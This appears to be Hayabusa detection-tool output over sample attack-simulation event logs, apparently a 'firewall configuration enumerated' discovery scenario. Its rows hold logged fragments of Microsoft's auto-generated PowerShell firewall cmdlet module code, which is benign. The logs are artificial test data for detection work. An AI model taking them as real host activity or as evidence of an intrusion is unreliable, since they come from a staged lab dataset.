Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_def,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"aultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 